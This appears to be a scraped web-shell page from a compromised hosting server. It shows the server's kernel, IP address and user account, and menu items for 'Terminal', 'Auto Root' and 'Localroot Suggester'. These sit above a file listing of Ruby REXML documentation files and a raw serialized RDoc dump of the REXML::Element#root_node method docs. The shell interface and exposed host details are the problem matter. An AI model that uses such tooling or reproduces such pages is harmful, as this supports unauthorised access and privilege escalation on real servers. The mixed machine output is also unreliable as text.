Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.222
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby27 /
share /
ri /
system /
REXML /
Element /
Delete
Unzip
Name
Size
Permission
Date
Action
%5b%5d-i.ri
882
B
-rw-r--r--
2023-06-06 18:25
__to_xpath_helper-i.ri
269
B
-rw-r--r--
2023-06-06 18:25
add_attribute-i.ri
1.35
KB
-rw-r--r--
2023-06-06 18:25
add_attributes-i.ri
666
B
-rw-r--r--
2023-06-06 18:25
add_element-i.ri
1.07
KB
-rw-r--r--
2023-06-06 18:25
add_namespace-i.ri
952
B
-rw-r--r--
2023-06-06 18:25
add_text-i.ri
1.01
KB
-rw-r--r--
2023-06-06 18:25
attribute-i.ri
270
B
-rw-r--r--
2023-06-06 18:25
attributes-i.ri
362
B
-rw-r--r--
2023-06-06 18:25
cdatas-i.ri
333
B
-rw-r--r--
2023-06-06 18:25
cdesc-Element.ri
1.75
KB
-rw-r--r--
2023-06-06 18:25
clone-i.ri
461
B
-rw-r--r--
2023-06-06 18:25
comments-i.ri
339
B
-rw-r--r--
2023-06-06 18:25
context-i.ri
378
B
-rw-r--r--
2023-06-06 18:25
delete_attribute-i.ri
1.11
KB
-rw-r--r--
2023-06-06 18:25
delete_element-i.ri
965
B
-rw-r--r--
2023-06-06 18:25
delete_namespace-i.ri
814
B
-rw-r--r--
2023-06-06 18:25
document-i.ri
401
B
-rw-r--r--
2023-06-06 18:25
each_element-i.ri
350
B
-rw-r--r--
2023-06-06 18:25
each_element_with_attribute-i.ri
1.41
KB
-rw-r--r--
2023-06-06 18:25
each_element_with_text-i.ri
1.33
KB
-rw-r--r--
2023-06-06 18:25
each_with_something-i.ri
364
B
-rw-r--r--
2023-06-06 18:25
elements-i.ri
358
B
-rw-r--r--
2023-06-06 18:25
get_elements-i.ri
647
B
-rw-r--r--
2023-06-06 18:25
get_text-i.ri
693
B
-rw-r--r--
2023-06-06 18:25
has_attributes%3f-i.ri
382
B
-rw-r--r--
2023-06-06 18:25
has_elements%3f-i.ri
612
B
-rw-r--r--
2023-06-06 18:25
has_text%3f-i.ri
350
B
-rw-r--r--
2023-06-06 18:25
ignore_whitespace_nodes-i.ri
277
B
-rw-r--r--
2023-06-06 18:25
inspect-i.ri
245
B
-rw-r--r--
2023-06-06 18:25
instructions-i.ri
351
B
-rw-r--r--
2023-06-06 18:25
namespace-i.ri
1.08
KB
-rw-r--r--
2023-06-06 18:25
namespaces-i.ri
251
B
-rw-r--r--
2023-06-06 18:25
new-c.ri
1.87
KB
-rw-r--r--
2023-06-06 18:25
next_element-i.ri
605
B
-rw-r--r--
2023-06-06 18:25
node_type-i.ri
249
B
-rw-r--r--
2023-06-06 18:25
prefixes-i.ri
567
B
-rw-r--r--
2023-06-06 18:25
previous_element-i.ri
628
B
-rw-r--r--
2023-06-06 18:25
raw-i.ri
581
B
-rw-r--r--
2023-06-06 18:25
root-i.ri
239
B
-rw-r--r--
2023-06-06 18:25
root_node-i.ri
1.39
KB
-rw-r--r--
2023-06-06 18:25
text%3d-i.ri
1.46
KB
-rw-r--r--
2023-06-06 18:25
text-i.ri
1.05
KB
-rw-r--r--
2023-06-06 18:25
texts-i.ri
330
B
-rw-r--r--
2023-06-06 18:25
whitespace-i.ri
898
B
-rw-r--r--
2023-06-06 18:25
write-i.ri
1.51
KB
-rw-r--r--
2023-06-06 18:25
xpath-i.ri
241
B
-rw-r--r--
2023-06-06 18:25
Save
Rename
U:RDoc::AnyMethod[iI"root_node:ETI"REXML::Element#root_node;TF:privateo:RDoc::Markup::Document:@parts[ o:RDoc::Markup::Paragraph; [ I"BEvaluates to the root node of the document that this element ;TI"Hbelongs to. If this element doesn't belong to a document, but does ;TI"Nbelong to another Element, the parent's root will be returned, until the ;TI" earliest ancestor is found.;To:RDoc::Markup::BlankLine o; ; [I"=Note that this is not the same as the document element. ;TI"IIn the following example, <a> is the document element, and the root ;TI"Lnode is the parent node of the document element. You may ask yourself ;TI"Lwhy the root node is useful: consider the doctype and XML declaration, ;TI"Iand any processing instructions before the document element... they ;TI"Iare children of the root node, or siblings of the document element. ;TI"IThe only time this isn't true is when an Element is created that is ;TI"Gnot part of any Document. In this case, the ancestor that has no ;TI""parent acts as the root node.;To:RDoc::Markup::Verbatim; [ I"+d = Document.new '<a><b><c/></b></a>' ;TI"a = d[1] ; c = a[1][1] ;TI"d.root_node == d # TRUE ;TI"$a.root_node # namely, d ;TI""c.root_node # again, d;T:@format0: @fileI"lib/rexml/element.rb;T:0@omit_headings_from_table_of_contents_below000[ I"();T@$FI"Element;TcRDoc::NormalClass00